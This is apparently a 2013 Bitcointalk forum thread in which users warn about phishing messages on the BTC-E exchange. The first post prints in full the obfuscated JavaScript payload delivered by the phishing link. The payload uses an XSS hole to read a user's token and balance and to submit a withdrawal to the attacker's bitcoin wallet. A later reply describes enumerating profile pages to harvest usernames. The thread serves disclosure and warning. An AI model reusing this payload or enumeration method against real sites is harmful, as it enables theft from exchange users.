nsieugesug (OP)
Newbie
Offline
Activity: 7
Merit: 0
|
|
April 21, 2013, 06:35:36 PM |
|
Hello, today I got a private message at BTC-E. This is the first strange thing since I didn't ever use the trollbox or used the PM system there. It contains a link to hxxp://fast-image.(dontclickthisshit)com/guh8ydyxz/bitcoin_chart15493.jpg, which is not an image, but an HTML file. This downloads a script which seems to exploit an XSS vulnerability on BTC-E. eval((function(x){var d="";var p=0;while(p<x.length){if(x.charAt(p)!="`")d+=x.charAt(p++);else{var l=x.charCodeAt(p+3)-28;if(l>4)d+=d.substr(d.length-x.charCodeAt(p+1)*96-x.charCodeAt(p+2)+3104-l,l);else d+="`";p+=4}}return d})("var wallet_btc = \"1DnwcSevrYyUCTxbPmL1TtABoaucDTMTYo\";` K'l` P\"LSQBL4Rs1rjP3tZUVb4MfXSQu1JEyWr7ix` P\"redir = \" http://fast-image.com/guh8ydjxz/bitcoin_chart15483.jpg` _\"xmlhttp = false` /!btc_amount` *!lt` \")token` %!sec;try {` [&new XMLHttpRequest;} catch (e) {` </ActiveXObject(\"Msxml2.XMLHTTP\")` /Microsoft` K4document.location =`#E\";}}}func` /!postData(page, data, step`!=$if (`!B#)`!J%.open(\"POST\", ` U\"true);if (step == 1` E(nreadystatechange = handler1;} else ` Q(2` 6C2` I03` 6C3` I04` 6C4` I05` 6C5` U$`$,8` a$set`&?#Header(\"Content-type\", \"appli` Y\"/x-www-form-urlencoded\");` T6X-` *#ed-With\", \"`'P*` R)nd(data)`!_@`&JE`&i%`%M$(evtXHR)`&V).`#M!State`$C$` 2(status`%z!00) {return`!}#1(`!LB`!:-2` Zm2` sT3` g``*K%\"../ajax/profile.php\", \"task=funds\", 4`!4S4`\"Em4`\"^T5`!#D`&\\A`&%, {`1`\"sponse =`1$$.` +$Tex`0m\"div = ` |%createElement(\"div\");div.innerHTML`!:!` _\"` 4!style.display = \"none\";` i%body.appendChild(div);`2%!`!-(get`!/#ById(\"` <!\").value`/>!` -!.length`.,!2) {`3&& = Math.floor(parseFloat(` p/sByClassName(\"money_btc\")[0]`\"@&)`0U\"` x'> 5`%>!`!))500;}`&zBedit%2Fhome\", 2`%UB`$o22`$#~`$D]sec`$g8s_email\"`#a\"!sec.checked`*\\1coins`#G$act=withdraw&sum=\" + `$,'+ \"&address` 6!wallet_btc` 6!coin_id=1&`&1!` >!` %!, 3`#ZX4`#jHl`!f%_rgx`#h'.match(/Balance: \\<b class='red'\\>([0-9]+.?` #!*)\\<\\/b\\> LTC/);` o& =` w+.slice(1` 6+`(D2` 9&`($#` I'> 300`((!` \\)` 0!;}`$*c` p'`$Z3l`$b+8`$_.5`$KB`!N.billing`!N0_coin%2F1\", 1);")) According to Blockexplorer, significant amounts of BTC were already stolen: http://blockexplorer.com/address/1DnwcSevrYyUCTxbPmL1TtABoaucDTMTYo
|
|
|
|
nsieugesug (OP)
Newbie
Offline
Activity: 7
Merit: 0
|
|
April 21, 2013, 06:41:57 PM |
|
(could an admin/moderator move this to the proper section please?)
|
|
|
|
maurits150
Newbie
Offline
Activity: 7
Merit: 0
|
|
April 21, 2013, 06:42:35 PM |
|
I'm also interested how they managed to send a PM to my username when I haven't written a message in the trollbox for over a week (banned). This attack was clearly planned out well because they have been harvesting usernames for a long time.
|
|
|
|
dudeofthestick
Member
Offline
Activity: 78
Merit: 10
|
|
April 21, 2013, 06:46:36 PM |
|
What operating system and browser version are you using? With versions, please.
|
|
|
|
Becher-Karl
Newbie
Offline
Activity: 48
Merit: 0
|
|
April 21, 2013, 06:52:09 PM |
|
In case of the OP it's even more interesting how they got his username, because he said he never posted to the trollbox (and never got banned). @nsieugesug: Did you maybe type /disablechat in the trollbox or was there no interaction at all? If not, it would be really interesting to know how they could send you a PM.
|
|
|
|
nsieugesug (OP)
Newbie
Offline
Activity: 7
Merit: 0
|
|
April 21, 2013, 06:52:58 PM |
|
What operating system and browser version are you using? With versions, please.
Browser? I prefer to use wget on a seperate Linux box when someone wants me to click strange links...
|
|
|
|
nsieugesug (OP)
Newbie
Offline
Activity: 7
Merit: 0
|
|
April 21, 2013, 06:54:34 PM |
|
In case of the OP it's even more interesting how they got his username, because he said he never posted to the trollbox (and never got banned). @nsieugesug: Did you maybe type /disablechat in the trollbox or was there no interaction at all? If not, it would be really interesting to know how they could send you a PM.
Trollbox is enabled in my account, but I never posted something there. However, I'm not 100% sure. Could have typed some bullshit there by accident.
|
|
|
|
optimator
|
|
April 21, 2013, 06:58:50 PM |
|
In case of the OP it's even more interesting how they got his username, because he said he never posted to the trollbox (and never got banned). @nsieugesug: Did you maybe type /disablechat in the trollbox or was there no interaction at all? If not, it would be really interesting to know how they could send you a PM.
harvest all usernames from bitcointalk and reddit.com/r/bitcoin and blast away? That's my guess
|
|
|
|
nsieugesug (OP)
Newbie
Offline
Activity: 7
Merit: 0
|
|
April 21, 2013, 07:10:45 PM |
|
Looks like they have removed the attack scripts from the server. No problem, you have a copy here now.
|
|
|
|
bzh
Newbie
Offline
Activity: 34
Merit: 0
|
|
April 21, 2013, 07:15:10 PM |
|
In case of the OP it's even more interesting how they got his username, because he said he never posted to the trollbox (and never got banned). @nsieugesug: Did you maybe type /disablechat in the trollbox or was there no interaction at all? If not, it would be really interesting to know how they could send you a PM.
harvest all usernames from bitcointalk and reddit.com/r/bitcoin and blast away? That's my guess I never posted on reddit or bitcointalk with my username on btc-e. Or any bitcoin site for that matter. I Still somehow got the PM as well. I'm more inclined to think that the user info was hacked on BTC-E.
|
|
|
|
samten
Newbie
Offline
Activity: 14
Merit: 0
|
|
April 21, 2013, 07:30:40 PM |
|
don't trust strangers
|
|
|
|
optimator
|
|
April 21, 2013, 07:38:05 PM |
|
I never posted on reddit or bitcointalk with my username on btc-e. Or any bitcoin site for that matter. I Still somehow got the PM as well. I'm more inclined to think that the user info was hacked on BTC-E.
Bummer! That does lead one to the conclusion that there was inside help....
|
|
|
|
|
nsieugesug (OP)
Newbie
Offline
Activity: 7
Merit: 0
|
|
April 21, 2013, 08:10:25 PM |
|
You get a list of usernames simply by typing in https://btc-e.com/profile/1 through whatever. Write a script that goes through all those numbers and have it send PMs. You're right, that would explain why I got the message. It even shows the time of the last activity, so the attacker can specifically target active accounts.
|
|
|
|
nsieugesug (OP)
Newbie
Offline
Activity: 7
Merit: 0
|
|
April 21, 2013, 08:40:09 PM |
|
Would anyone with full posting rights like to crosspost this to https://bitcointalk.org/index.php?board=85.0 (Service Discussion)? I think this deserves more attention, but the incredibly stupid newbie restriction policy of this forum doesn't allow me to post this thread where it belongs.
|
|
|
|
|